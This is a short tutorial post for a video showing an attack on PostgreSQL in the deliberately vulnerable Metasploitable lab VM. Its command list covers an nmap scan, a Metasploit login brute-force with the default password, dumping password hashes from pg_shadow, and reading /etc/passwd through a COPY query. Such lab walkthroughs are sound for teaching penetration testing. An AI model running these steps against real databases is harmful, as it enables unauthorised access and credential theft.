Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826083
Download video: http://www.mediafire.com/?ss7846wm542djka
What is this?
This video demonstrates an attack on the PostgreSQL database service on the metasploitable hackable box.
"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com
Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to brute force the login (gaining access)
> By using PostgreSQL client we are able to send commands to the database (Discover password hashes and reading files)
What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> MySQL --- on Backtrack 4 (Final)
> Dictionaries/Word-lists --- defaults with metasploit work (/pentest/exploits/framework3/data/wordlists)
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F) Commands:
Code:
nmap 192.168.1.1-255
nmap -sS -sV -O -f -n 192.168.1.105
msfconsole
search postgresql
use scanner/postgres/postgres_login
show options
set RHOSTS 192.168.1.105
exploit
psql -h 192.168.1.105 -U postgres -W
postgres
select usename, passwd from pg_shadow;
select current_database();
create table myfile (input TEXT); copy myfile from '/etc/passwd';select input from myfile;
Notes:
Song: Carl Cox - Phoebus Apollo
Video length: 3:24
Capture length: 5:58
Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-postgresql.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30075-%5Bvideo%5D-metasploitable-postgresql.html#post167039
[Video] Metasploitable - PostgreSQL
